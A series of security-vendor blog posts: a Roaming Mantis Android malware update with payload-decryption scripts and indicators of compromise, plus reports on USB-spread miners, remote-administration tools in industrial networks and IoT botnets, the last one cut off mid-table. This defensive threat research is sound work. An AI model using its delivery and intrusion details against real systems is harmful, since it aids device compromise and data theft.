In addition we would like to thank and credit security researchers from LAC Co. Ltd. for a very insightful article describing how vulnerable routers were compromised by the Roaming Mantis group, which was disclosed in their Japanese blogpost in June 2018. According to this research, the threat actor logged in to their router using default ID and password, and changed legitimate DNS settings to rogue DNS settings, where the router’s control panel was accessible over the Internet.

The Roaming Mantis group did not stop its activities after publication of our reports. We have confirmed several new activities and changes to their illegal profit-gaining methods, such as web crypto-mining for iOS devices, spreading via a malicious content delivery system and so on. This blogpost reveals some details of our new findings related to Roaming Mantis, based on our research.

Web crypto-mining for iOS devices

The criminals previously targeted iOS devices using an Apple phishing site to steal credentials. However, they changed the HTML source code of the malicious landing page as follows:

Part of HTML source code of the malicious landing page for iOS

The code above shows that they disabled redirection to the fake Apple portal (with a phishing page) and added code with a web mining script (previously used only for the PC platform) to run mining on iOS devices.

If the user visits this landing page from an iOS device, a blank page displays in the web browser. In the background, CPU usage increases to 90% immediately.

Screen capture of the landing page and CPU monitoring tool

Interestingly, the day after we confirmed this, the attacker switched back to Apple phishing again. We believe that the criminals, at that time, were testing the possible revenue from web mining on iOS devices, looking for an efficient way to monetize their activities.

Filtering Japanese devices

One thing we noticed is that the criminals responded to a number of articles and research activities coming from Japan. A new feature was added to the landing page to filter out Japanese environments:

Added confirmation of Japanese environment for filtering

It looks like they want to slow down infections of Japanese targets for the time being.

Spreading via another malware delivery system

In the middle of July 2018, the live landing page we had been monitoring unfortunately went dark. However, the malicious APK files of Roaming Mantis, detected as “”, were still being detected by our customers, according to our KSN data.

Number of detected users from KSN data (Jun 10, 2018 – Sep 10, 2018)

Our deeper investigation revealed that their new malware spreading method was the one used by other Android malware, the “sagawa.apk” delivery system. We published a Japanese blogpost on this Android malware in January 2018. Trend Micro named it FAKESPY and published a blogpost about it, “FakeSpy Android Information-Stealing Malware Targets Japanese and Korean-Speaking Users”. As described in our previous blogpost, the infection vector is a phishing SMS message spoofing a notification from a Japanese delivery company. The message contains a malicious URL; if the user clicks it, the server displays a fake website that downloads and installs the malicious application “sagawa.apk”. We discovered two types of such “sagawa.apk” samples:

                             Type A                                     Type B
File name                    sagawa.apk                                 sagawa.apk
md5                          956f32a28d0057805c7234d6a13aa99b           a19f4cb93274c949e66efe13173c95e6
File size                    427KB (437,556)                            2.3MB (2,381,665)
Loader module                \classes.dex                               \classes.dex + \lib\x86_64\
Encrypted payload (enc_data) \assets\a                                  \assets\
Decrypt algorithm            payload = base64_dec(zlib_dec(enc_data))   aes_key = base64_dec(hardcoded data);
                                                                        payload = AES_dec(enc_data, aes_key)
Alias                        MaqHao (McAfee), XLoader (TrendMicro)      FAKESPY (TrendMicro)
Old file name                facebook.apk, ${random}.apk                sagawa.apk

Based on detailed static analysis, they belong to different Android malware families. Both Type A and Type B have common features, such as monitoring SMS messages and stealing data from infected devices. However, there are differences in their code structure, communication protocol and other features. One significant difference is that Type B targets Japan only, unlike Type A which is multilingual. Type B contains hardcoded strings that are displayed to infected users. These strings are in Japanese only.

Japanese messages displayed to infected users

In addition, this malware checks whether a domestic Japanese prepaid card application is installed on the infected device.

Check for the domestic Japanese prepaid card application “Au Wallet”

If the application is installed on the device, the malware downloads and installs a fake application as its update.

Unfortunately, the relationship between the Roaming Mantis group and the service owner of the “sagawa.apk” delivery mechanism isn’t very clear at the moment. They might just use the same service as customers, or might not. However, it is clear that these criminal groups use the same malware-spreading eco-system for spreading their Android malware.

Researchers may use the following simplified Python scripts to extract the payload from “sagawa.apk” (the first for Type A, the second for Type B):

#!/usr/bin/env python
# Type A: payload = base64_dec(zlib_dec(enc_data))
# usage: extract_a.py <assets/a>  -> writes <assets/a>.dec
import sys
import zlib
import base64

data = open(sys.argv[1], "rb").read()
dec_z = zlib.decompress(data)       # first layer: zlib
dec_b = base64.b64decode(dec_z)     # second layer: base64
with open(sys.argv[1] + ".dec", "wb") as fp:
    fp.write(dec_b)

#!/usr/bin/env python
# Type B: aes_key = base64_dec(hardcoded data); payload = AES_dec(enc_data, aes_key)
# usage: extract_b.py <encrypted payload> <base64 key>  -> writes <payload>.dec
# Requires PyCryptodome (pip install pycryptodome)
import sys
import base64
from Crypto.Cipher import AES

data = open(sys.argv[1], "rb").read()
key = sys.argv[2]                   # the hardcoded key in the Type B sample is H8chGVmHxKRdjVSO14Mvgg==
aes_key = base64.b64decode(key)     # 16 bytes, i.e. AES-128
# The cipher mode is not shown in the original script; ECB is assumed here and
# should be confirmed against the sample's decryption routine.
aes = AES.new(aes_key, AES.MODE_ECB)
dec = aes.decrypt(data)
with open(sys.argv[1] + ".dec", "wb") as fp:
    fp.write(dec)

Spreading via Prezi like a scam

We also observed another malware distribution method of Roaming Mantis which is linked to Prezi. Prezi is a popular computer application and online service for creating dynamic presentations. The criminals used this service to spread their scam. When a user visits a page crafted by the attackers, a link is shown offering free content such as adult video, a game, a comic, music and so on, like pirate editions.

Redirection to a scam page

Based on our research, there were multiple messages leveraging different social engineering tricks to invite users to a scam website. On the other hand, the Roaming Mantis’ landing page was found to be linked to several such accounts carrying out redirections.

Corrupted landing page code from Roaming Mantis posted on Prezi

Fortunately, this code does not work because of mistakes made when it was prepared.

Records of stolen data

Kaspersky Lab discovered fragments of data stolen from victims’ Android devices via Type A of the malware, which suggests thousands of compromised victims:

Suspected stolen data from victims’ Android devices

This data contained phone number, date, IP, language, email/id, password, name, date of birth, address, credit card information including cvv, bank information, and secret question and answer in Simplified Chinese. Data headers in Chinese suggest that the attackers are fluent in Chinese – unless this is a false flag, of course. The first column seems to contain the record number, which in July was already over 4,800. The user device language setting may indicate victims’ geography. Below is a pie chart created from the language data:


Victims’ language settings

The top language is “en-us” (39%), the second is “ko-kr”, the third is “ru”. Judging from this data, the victims’ geographical distribution has changed significantly since our first report. This might be due to the update adding support for 27 languages and to the new distribution strategies. “en-us” may be the most common setting because English is used as a second language in several countries.


In previous reports, we claimed that the Roaming Mantis campaign had evolved significantly in a short period of time, applying new attack methods and expanding its targets. The campaign does not seem to have stopped developing. In our recent research, we found that they tried out a web miner for iOS instead of redirecting to a fake Apple website.

Another new method they applied is the use of a malware delivery eco-system that is probably operated by a third party and was used to spread other (maybe even unrelated) malware in the past. The infection vector in that case was an SMS message with a malicious link that led a user to a fake web site that offered a download of the malicious apk file “sagawa.apk”. It is not clear how Roaming Mantis and the distributor of “sagawa.apk” are related, but it’s worth mentioning the fact that they are now using the same eco-system.

Roaming Mantis is also trying to spread its malware via Prezi, with a scam that offers a visitor free content such as videos and more.

Judging from the list of stolen credentials, the attackers seem to have stolen a large amount of data from victims worldwide. This gives us a glimpse of the real scale of the attack, but we believe that this is just the tip of the iceberg.

We strongly recommend that Android users turn off the option that allows installation of applications from third-party repositories, to keep their device safe. They should also be suspicious if their phones become unusually hot, which may be a side-effect of the hidden crypto-mining application in action.

Kaspersky Lab products detect this malware with the following verdict:

  • HEUR:Trojan-Banker.AndroidOS.Wroba

IoCs

Malicious hosts:
  • 59.105.6[.]230
  • sagawa-otqwt[.]com
  • sagawa-polsw[.]com
Hashes of Type A:
Hashes of Type B:


SANS Tip of the Day - Thu, 09/27/2018 - 01:00
Ransomware is a special type of malware. Once it infects your computer, it encrypts all of your files and demands you pay a ransom if you want your files back. Be suspicious of any emails trying to trick you into opening infected attachments or clicking on malicious links; common sense is your best defense. In addition, backups are often the only way you can recover from ransomware.

USB threats from malware to miners

Malware Alerts - Tue, 09/25/2018 - 06:00


In 2016, researchers from the University of Illinois left 297 unlabelled USB flash drives around the university campus to see what would happen. 98% of the dropped drives were picked up by staff and students, and at least half were plugged into a computer in order to view the content. For a hacker trying to infect a computer network, those are pretty irresistible odds.

USB devices have been around for almost 20 years, offering an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors, most famously by the Stuxnet worm in 2010, which used USB devices to inject malware into the network of an Iranian nuclear facility.

Today, cloud services such as Dropbox have taken on much of the heavy lifting in terms of file storage and transfer, and there is greater awareness of the security risks associated with USB devices. Their use as an essential business tool is declining. Despite this, millions of USB devices are still produced and distributed annually, with many destined for use in homes, businesses and marketing promotion campaigns like trade show giveaways.

USB devices remain a target for cyberthreats. Kaspersky Lab data for 2017 shows that every 12 months or so, around one in four users worldwide is affected by a ‘local’ cyber incident. These are attacks detected directly on a user’s computer and include infections caused by removable media like USB devices.

This short report reviews the current cyberthreat landscape for removable media, particularly USBs, and provides advice and recommendations on protecting these little devices and the data they carry.

Methodology and key findings

The overview is based on detections by Kaspersky Lab’s file protection technologies in the drive root of user computers, with a specific scan filter and other measures applied. It covers malware-class attacks only and does not include detections of potentially dangerous or unwanted programs such as adware or risk tools (programs that are not inherently malicious, but are used to hide files or terminate applications, etc. that could be used with malicious intent). The detection data is shared voluntarily by users via Kaspersky Security Network (KSN).

Key findings
  • USB devices and other removable media are being used to spread cryptocurrency mining software – and have been since at least 2015. Some victims were found to have been carrying the infection for years.
  • The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.
  • One in 10 of all users hit by removable media infections in 2018 was targeted with this crypto-miner (around 9.22%, up from 6.7% in 2017 and 4.2% in 2016).
  • Other malware spread through removable media/USBs includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.
  • The 2010 Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.
  • Emerging markets are the most vulnerable to malicious infection spread by removable media – with Asia, Africa and South America among the most affected – but isolated hits were also detected in countries in Europe and North America.
  • Dark Tequila, a complex banking malware reported on August 21, 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.
The evolving cyberthreat landscape for USBs

Infections caused by removable media are defined as local threats – those that are detected directly on a user’s computer, for example, during a scheduled, installation or user-initiated security scan. Local threats differ from threats targeting computers over the internet (web-borne threats), which are far more prevalent. Local infections can also be caused by an encrypted malicious program hidden in a complex installer. To isolate the data for malware spread by removable media such as USB devices, we took the detections triggered in the drive root of affected computers – a strong indicator that the infection source is removable media.

This data shows that the number of removable media (drive root) threat detections has declined steadily since 2014, but the rate of decline may be slowing down. In 2014, the ratio of users affected by a removable media threat to the total number of such threats detected was 1:42; by 2017 this had dropped by around half to 1:25; the estimate for 2018 is around 1:22.

These numbers pale in comparison to web-borne threats: in 2017, Kaspersky Lab’s file antivirus detected 113.8 million likely removable media threats, while its web antivirus repelled just under 1.2 billion attacks launched from online resources. In light of this, it can be easy to overlook the enduring risks presented by removable media, even though around four million users worldwide will be infected in this way in 2018.


Total number (in millions) of malware detections triggered in the drive root of user computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN


Number of unique users (in millions) with malware detections triggered in the drive root of computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN

USBs as a tool for advanced threat actors

USB devices appeal to attackers targeting computer networks that are not connected to the internet – such as those powering critical national infrastructure. The most famous example of this is probably the Stuxnet campaign. In 2009 and 2010, the Stuxnet worm targeted Iran’s nuclear facilities in order to disrupt operations.

USB devices were used to inject malware into the facilities’ air-gapped networks. Among other things, the devices included an exploit to a Windows LNK vulnerability (CVE-2010-2568) that enabled remote code execution. Other advanced threat actors, including Equation Group, Flame, Regin and HackingTeam, have all integrated exploits for this vulnerability into removable media to use in attacks.

Further, the structure of most USB devices allows them to be converted to provide hidden storage compartments, for the removal of stolen data, for example. The ProjectSauron 2016 toolkit was found to include a special module designed to move data from air-gapped networks to internet-connected systems. This involved USB drives that had been formatted to change the size of the partition on the USB disk, reserving some hidden space (several hundred megabytes) at the end of the disk for malicious purposes.

The Stuxnet survivor CVE-2010-2568

Microsoft fixed the last of the vulnerable LNK code paths in March 2015. However, in 2016, as many as one in four Kaspersky Lab users who encountered an exploit through any attack medium, including web-borne threats, faced an exploit for this vulnerability (although it was overtaken in 2017 by the EternalBlue exploit). CVE-2010-2568 also continues to feature in malware distributed by USB devices and other removable media: despite rapidly falling numbers of detections and victims, it still ranks among the top 10 drive root threats detected by KSN.


Total drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN


Users with drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN

If the exploit detections provide an indication of the volume of malware being transmitted via removable media such as USBs, the following illustrate the kind of malware being distributed in this way.

Malware delivered via removable media

The top malware spread via removable media has stayed relatively consistent since at least 2016. For example, the family of Windows LNK malware, Trojans containing links for downloading malicious files or paths for launching a malicious executable, has remained among the top three threats spread by removable media. This malware is used by attackers to destroy, block, modify or copy data, or to disrupt the operation of a device or its network. The WinLNK Runner Trojan, which was the top detected USB threat in 2017, is used in worms for launching executable files.

In 2017, 22.7 million attempted WinLNK.Agent infections were detected, affecting nearly 900,000 users. The estimate for 2018 is around 23 million attacks, hitting just over 700,000 users. This represents a 2% rise in detections and a 20% drop in the number of users targeted year-on-year.

For the WinLNK Runner Trojan the numbers are expected to fall more sharply – with a 61% drop in detections from 2.75 million in 2017 to an estimated 1 million in 2018; and a decline of 51% in the number of users targeted (from around 920,000 in 2017 to just over 450,000 in 2018).

Other top malware spread through USB devices includes the Sality virus, first detected in 2003 but heavily modified since; and the Dinihou worm that automatically copies itself onto a USB drive, creating malicious shortcuts (LNKs) that launch the worm as soon as the new victim opens them.

Miners – rare but persistent

USB devices are also being used to spread cryptocurrency mining software. This is relatively uncommon, but successful enough for attackers to continue using this method of distribution. According to KSN data, a popular crypto-miner detected in drive roots is Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all, known since 2014.

Malware in this family secretly uses the processor capacity of the infected computer to generate the cryptocurrency. The Trojan drops the mining application onto the PC, then installs and silently launches the mining software and downloads the parameters that enable it to send the results to an external server controlled by the attacker.

Kaspersky Lab’s data shows that some of the infections detected in 2018 date back years, indicating a lengthy infection likely to have had a significant negative impact on the processing power of the victim device.

Detection data for the 32-bit version of Trojan.Win32.Miner.ays is as follows:

    Year                          Detection data for Trojan.Win32.Miner.ays   Unique user count
    2017                          778,620                                     236,000
    2018 (estimate based on H1)   600,698                                     196,866

Between H1 2017 (136,954 unique users) and H1 2018 (93,433 unique users), there was a fall of 28.13 percentage points in the number of people affected by the 32-bit version of the miner.

The other version, Trojan.Win64.Miner.all, saw an expected surge in the first year of detection, after which the number of users hit has levelled out to a steady growth rate of around one-sixth per year. This small but steady growth rate can also be seen when the number of users targeted with this mining malware is compared against the overall number of users hit by removable media threats. This shows that around one in 10 users hit with a removable media threat in 2018 will be targeted with this miner, about a two-fold rise in two years.

These results suggest that propagation via removable media works well for this threat.

Detection data for Trojan.Win64.Miner.all is as follows:

    Year                          Detection data for Trojan.Win64.Miner.all   Unique user count   YoY change   Unique user count as share of all users hit with a removable media threat
    2016                          4,211,246                                   245,702             +70.15%      4.2%
    2017                          4,214,785                                   301,178             +18.42%      6.7%
    2018 (estimate based on H1)   4,209,958                                   362,242             +16.42%      9.2%

Dark Tequila – advanced banking malware

In August 2018, Kaspersky Lab researchers reported on a sophisticated cyber operation code-named Dark Tequila that has been targeting users in Mexico for at least the last five years, stealing bank credentials and personal and corporate data with malware that can move laterally through the victim computer while offline.

According to Kaspersky Lab researchers, the malicious code spreads through infected USB devices and spear phishing and includes features to evade detection. The threat actor behind Dark Tequila is believed to be Spanish-speaking and Latin American in origin.

Target geography

Emerging markets appear to be the most vulnerable to infection by removable media.

The annual numbers for 2017 show that in many such countries, around two-thirds of users experienced a ‘local’ incident, which includes drive root malware infections from removable media, compared to less than one in four in developed economies. These figures appear to be remaining consistent into 2018.

For the LNK exploit spread through removable media, the most affected countries in 2018 to date are Vietnam (18.8% of users affected), Algeria (11.2%) and India (10.9%), with infections also found in the rest of Asia, Russia and Brazil, among others, and a few hits in a number of European countries (Spain, Germany, France, the UK and Italy), the U.S. and Japan.


Share of users affected by an exploit for CVE-2010-2568 through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included)

The reach is broader for the miner. Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all detections are mainly found in India (23.7%), Russia (18.45% – likely to be influenced by a larger customer base) and Kazakhstan (14.38%), with infections also found in other parts of Asia and Africa, and a few hits in several European countries (the UK, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark and Sweden), the U.S., Canada and Japan.


Share of users affected by the bitcoin cryptocurrency miner through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included)

Conclusion and advice

The main purpose of this short paper is to raise awareness of a threat that consumers and businesses may underestimate.

USB drives offer many advantages: they are compact and handy, and a great brand asset, but the devices themselves, the data stored on them and the computers they are plugged into are all potentially vulnerable to cyberthreats if left unprotected.

Fortunately, there are some effective steps consumers and organizations can take to secure the use of USB devices.

Advice for all USB users:

  • Be careful about the devices you connect to your computer – do you know where they came from?
  • Invest in encrypted USB devices from trusted brands – this way you know your data is safe even if you lose the device
  • Make sure all data stored on the USB is also encrypted
  • Have a security solution in place that checks all removable media for malware before they are connected to the network – even trusted brands can be compromised through their supply chain

Additional advice for businesses:

  • Manage the use of USB devices: define which USB devices can be used, by whom and for what
  • Educate employees on safe USB practices – particularly if they are moving the device between a home computer and a work device
  • Don’t leave USBs lying around or on display

Kaspersky Lab’s security solutions, such as Kaspersky Endpoint Security for Windows, provide security and encryption for all removable media including USB devices.

Secure Your Home Wi-Fi Network

SANS Tip of the Day - Tue, 09/25/2018 - 01:00
Be aware of all the devices connected to your home network, including baby monitors, gaming consoles, TVs, appliances or even your car. Ensure all those devices are protected by a strong password and/or are running the latest version of their operating system.

Kids and Family Members

SANS Tip of the Day - Fri, 09/21/2018 - 01:00
If you have children visiting or staying with family members (such as grandparents), make sure the family members know your rules concerning technology that your kids must follow. Just because your kids leave the house does not mean the rules about what they can do online change.

Threats posed by using RATs in ICS

Malware Alerts - Thu, 09/20/2018 - 06:00

While conducting audits, penetration tests and incident investigations, we have often come across legitimate remote administration tools (RAT) for PCs installed on operational technology (OT) networks of industrial enterprises. In a number of incidents that we have investigated, threat actors had used RATs to attack industrial organizations. In some cases, the attackers had stealthily installed RATs on victim organizations’ computers, while in other cases, they had been able to use the RATs that were installed in the organization at the time of the attacks. These observations prompted us to analyze the scope of the threat, including the incidence of RATs on industrial networks and the reasons for using them.


The statistical data presented in this paper was collected using the Kaspersky Security Network (KSN) from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:

  • supervisory control and data acquisition (SCADA) servers;
  • data storage servers (Historian);
  • data gateways (OPC);
  • stationary workstations of engineers and operators;
  • mobile workstations of engineers and operators;
  • Human Machine Interface (HMI).

As part of our research, we considered and analyzed all popular RATs for Windows, with the exception of Remote Desktop, which is part of the Windows operating system. Our research into this RAT is ongoing and will be presented in the next paper of the series.

The use of RATs in ICS

According to KSN data, in the first half of 2018, legitimate RATs (programs categorized as not-a-virus: RemoteAdmin) were installed and used on one ICS computer in three.


Percentage of ICS computers that have RATs legitimately installed on them

The statistics support our observations: RATs are indeed often used on OT networks of industrial enterprises. We believe this could be due to attempts to reduce costs associated with maintaining ICS and minimize the response time in the event of malfunction.

As we were able to find out, remote access to computers on the OT network is not restricted to administrators and engineers inside the enterprise network’s perimeter. It can also be made available via the internet to users outside the enterprise network perimeter. Such users can include representatives of third-party enterprises – employees of system integrators or ICS vendors, who use RATs for diagnostics, maintenance and to address any ICS malfunctions. As our industrial network security audits have shown, such access is often poorly supervised by the enterprise’s responsible employees, while remote users connecting to the OT network often have excessive rights, such as local administrator privileges, which is obviously a serious issue in terms of ensuring the information security of industrial automation systems.

From interviews with engineers and operators of various industrial systems that we have audited, and based on an analysis of ICS user documentation, we have determined that RATs are most commonly used on industrial networks according to the following scenarios:

  1. To control/monitor HMI from an operator workstation (including displaying information on a large screen);
  2. To control/maintain HMI from an engineering workstation;
  3. To control SCADA from an operator workstation;
  4. To provide SCADA maintenance from an engineering workstation or a computer of a contractor/vendor (from an external network);
  5. To connect multiple operators to one operator workstation (thin client-like architecture used to save money on licenses for the software used on operator workstations);
  6. To connect to a computer on the office network from the OT network via HMI and perform various tasks on that computer (access email, access the internet, work with office documents, etc.).

Some of the scenarios listed above indicate that the use of RATs on the OT network can be explained by operational requirements, which means that giving up the use of RATs would unavoidably entail modifications to work processes. At the same time, it is important to realize that an attack on a poorly protected RAT could easily cause disruptions to the industrial process and any decisions on using RATs on the OT network should be made with this in mind. Tight controls on the use of RATs on the OT network would help to reduce the attack surface and the risk of infection for systems administered remotely.


TOP 20 countries by percentage of ICS computers on which RATs were used at least once during the first half of 2018 (to all ICS computers in each country)

Scenarios of RAT installation on ICS computers

According to our research, there are three most common scenarios of RAT installation on ICS computers:

  1. Installation of ICS software distribution packages that include RATs (using separate distribution packages or ICS software installers). RATs included in ICS software distribution packages make up 18.6% of all RATs we have identified on ICS computers protected by Kaspersky Lab products.


Percentage of RATs bundled with ICS products to all RATs found on ICS computers

  2. Deliberate installation of RATs by personnel or suppliers – network administrators, engineers, operators, or integrator companies. We do not undertake to judge whether these installations are legitimate. Based on our experience of industrial network audits and incident investigation, we can state that many such installations do not comply with the organization’s information security policy and some are installed without the knowledge of respective enterprises’ responsible employees.
  3. Stealthy installation of RATs by malware. An example of this is a recent attack that we have investigated (see below).

RAT-related threats to ICS

Threats associated with the use of RATs on industrial networks are not always obvious, nor are the reasons for which RATs are used.

Most of the RATs we have identified on industrial systems have the following characteristics that significantly reduce the security level of the host system:

  • Elevated privileges – the server part of a RAT is often executed as a service with system privileges, i.e., NT SYSTEM;
  • No support for restricting local access to the system / client activity;
  • Single-factor authentication;
  • No logging of client activity;
  • Vulnerabilities (our report on zero-day vulnerabilities identified in popular RAT systems that are used, among other applications, in products by many ICS vendors, will be published by the end of the year);
  • The use of relay servers (for reverse connections) that enable RATs to bypass NAT and firewall restrictions on the network perimeter.

The most critical RAT-related problem is the use of elevated privileges and the absence of any means to limit these privileges (or to restrict a remote user’s local access). In practice, this means that if attackers (or malware) gain access to a remote user’s computer, steal authentication data (login/password), hijack an active remote administration session or successfully attack a vulnerability in the RAT’s server part, they will gain unrestricted control of the ICS system. By using relay servers for reverse connections, attackers can also connect to these RATs from anywhere in the world.

There are also other issues that affect RATs built into ICS software distribution packages:

  • RAT components and distribution packages are rarely updated (even if new versions of ICS distribution packages are released). This makes them more likely to contain vulnerabilities;
  • In the vast majority of cases, the default password is used – it is either hardcoded into the RAT by the ICS software vendor or specified in the documentation as “recommended”.

RATs are legitimate software tools that are often used on industrial networks, which means it can be extremely difficult to distinguish attacks involving RATs from legitimate activity. In addition, since the information security service and other employees responsible for ICS security are often unaware that a RAT is installed, the configuration of RATs is in most cases not analyzed when auditing the security of an industrial network. This makes it particularly important to control by whom, when and for what purposes RATs are used on the industrial network and to ensure that it is completely impossible to use RATs without the knowledge of employees responsible for the OT network’s information security.

Attacks of threat actors involving RATs

Everything written above applies to potential threats associated with the use of RATs.

Based on our analysis of KSN statistics, we were able to identify a number of attacks and malware infection attempts involving RATs installed on ICS computers. In most cases, attacks were based on the following scenarios (in the descending order of attack incidence):

  1. A brute force network attack from the local network or the internet designed to crack logins/passwords;
  2. An attacker or malware using a RAT to download and execute malware using stolen or cracked authentication credentials;
  3. A remote user (probably a legitimate user deceived by attackers) using a RAT to download a Trojan to an ICS computer and then executing it; the Trojan can be disguised as an office document, non-industrial software (a game, multimedia software, etc.), a crack/keygen for office, application or industrial software, etc.;
  4. A network attack from the local network or the internet on the server part of the RAT using exploits.

Brute force type network attacks (designed to crack logins/passwords) are the most common: their implementation does not require any special knowledge or skills and the software used in such attacks is publicly available.

It cannot be determined from the available data who connects to a RAT’s server part installed on an ICS computer – a legitimate user, an attacker or malware – or why. Consequently, we can only guess whether this activity represents a targeted attack, a sabotage attempt or a mistake by a legitimate user.

Network attacks from the internet were most probably conducted by threat actors using malware, penetration testing tools or botnets.

Network attacks from the local network could indicate the presence of attackers (possibly including an insider) on the network. Another possibility is that there is a compromised computer on the local network that is either infected with malware or is used by the attacker as a point of presence (if the authentication credentials were compromised earlier).

Attacks on industrial enterprises using RMS and TeamViewer

In the first half of 2018, Kaspersky Lab ICS CERT identified a new wave of phishing emails disguised as legitimate commercial offers. Although the attacks targeted primarily industrial companies within the territory of Russia, the same tactics and tools can be used in attacks on industrial companies in any country of the world.

The malware used in these attacks installs legitimate remote administration software on the system — TeamViewer or Remote Manipulator System/Remote Utilities (RMS). In both cases, a system DLL is replaced with a malicious library to inject malicious code into a legitimate program’s process. This provides the attackers with remote control of the infected systems. Various techniques are used to mask the infection and the activity of the software installed on the system.

If necessary, the attackers download an additional malware pack to the system, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools that extend the threat actor’s control of infected systems, malware to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.

According to available data, the attackers’ main goal is to steal money from victim organizations’ accounts, but possible attack scenarios are not limited to the theft of funds. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines. Clearly, on top of the financial losses, these attacks result in leaks of victim organizations’ sensitive data.

Multiple attacks on an auto manufacturer

A characteristic example of attacks based on the second scenario was provided by attacks on the industrial network of a motor vehicle manufacturing and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles. Multiple attempts to conduct such attacks were blocked by Kaspersky Lab products.

A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Starting in late 2017, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. Infection attempts were made regularly over a period of several months – 2-3 times a week, at different times of the day. Based in part on other indirect indicators, we believe that RAT authentication data was compromised and used by attackers (or malware) to attack the enterprise’s computers over the internet.

After gaining access to the potential victim’s infrastructure via the RAT, the attackers kept trying to choose a malicious packer that would enable them to evade antivirus protection.

The blocked programs included modifications of the malware detected by Kaspersky Lab products as When launched, this worm immediately begins to spread across the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.

The Nymaim Trojan family was also blocked. Representatives of this family are often used to download modifications of botnet agents from the Necurs family, which in turn have often been used to infect computers with ransomware from the Locky family.


Remote administration tools are widely used on industrial networks for ICS monitoring, control and maintenance. The ability to manipulate the ICS remotely significantly reduces maintenance costs, but at the same time, uncontrolled remote access, the inability to provide 100% verification of the remote client’s legitimacy, and the vulnerabilities in RAT code and configuration significantly increase the attack surface. At the same time, RATs, along with other legitimate tools, are increasingly used by attackers to mask malicious activity and make attribution more difficult.

To reduce the risk of cyberattacks involving RATs, we recommend the following high-priority measures:

  • Audit the use of application and system remote administration tools on the industrial network, such as VNC, RDP, TeamViewer, and RMS / Remote Utilities. Remove all remote administration tools that are not required by the industrial process.
  • Conduct an audit and disable remote administration tools which came with ICS software (refer to the relevant software documentation for detailed instructions), provided that they are not required by the industrial process.
  • Closely monitor and log events for each remote control session required by the industrial process; remote access should be disabled by default and enabled only upon request and only for limited periods of time.

New trends in the world of IoT threats

Malware Alerts - Tue, 09/18/2018 - 06:00

Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.

We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.


Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.

One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypots than all other types combined.

Service   % of attacks
Telnet    75.40%
SSH       11.59%
Other     13.01%

When it came to downloading malware onto IoT devices, cybercriminals’ preferred option was one of the Mirai family (20.9%).

#    Downloaded malware                    % of attacks
1    Backdoor.Linux.Mirai.c                15.97%
2    Trojan-Downloader.Linux.Hajime.a       5.89%
3    Trojan-Downloader.Linux.NyaDrop.b      3.34%
4    Backdoor.Linux.Mirai.b                 2.72%
5    –                                      1.94%
6    Trojan-Downloader.Shell.Agent.p        0.38%
7    –                                      0.27%
8    Backdoor.Linux.Mirai.n                 0.27%
9    –                                      0.24%
10   –                                      0.20%

Top 10 malware downloaded onto infected IoT device following a successful Telnet password crack

And here are the Top 10 countries from which our traps were hit by Telnet password attacks:


Geographical distribution of the number of infected devices, Q2 2018.

As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.

Since some smart device owners change the default Telnet password to one that is more complex, and many gadgets don’t support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.

An example of the use of “alternative technology” is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:

Advantages of this distribution method over password cracking:

  • Infection occurs much faster
  • It is much harder to patch a software vulnerability than change a password or disable/block the service

Although this method is more difficult to implement, it found favor with many virus writers, and it wasn’t long before new Trojans exploiting known vulnerabilities in smart device software started appearing.

New attacks, old malware

To see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. This is the picture that emerged for Q2 2018:

Service            | Port     | % of attacks | Attack vector                                                                                   | Malware families
Telnet             | 23, 2323 | 82.26%       | Bruteforce                                                                                      | Mirai, Gafgyt
SSH                | 22       | 11.51%       | Bruteforce                                                                                      | Mirai, Gafgyt
Samba              | 445      | 2.78%        | EternalBlue, EternalRed, CVE-2018-7445                                                          | –
